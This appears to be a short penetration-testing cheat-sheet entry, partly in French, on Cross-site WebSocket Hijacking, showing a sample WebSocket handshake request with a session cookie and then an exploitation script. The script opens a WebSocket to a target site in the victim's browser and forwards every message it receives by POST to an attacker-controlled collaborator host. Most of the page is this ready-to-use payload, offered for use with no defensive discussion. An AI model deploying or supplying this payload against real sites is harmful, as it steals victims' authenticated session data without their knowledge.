🚀Cross-site WebSocket Hijacking (CSWSH)
Exemple
GET /chat HTTP/1.1
Host: normal-website.com
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: wDqumtseNBJdhkihL6PW7w==
Connection: keep-alive, Upgrade
Cookie: session=KOsEJNuflw4Rd9BDNrVmvwBF9rEijeE2
Upgrade: websocketExploitation
<script>
var ws = new WebSocket('wss://target.com/endpoint');
ws.onopen = function() {
ws.send("<start message>");
};
ws.onmessage = function(event) {
fetch('https://your-burp.collab.com', {method: 'POST', mode: 'no-cors', body: event.data});
};
</script>Mis à jour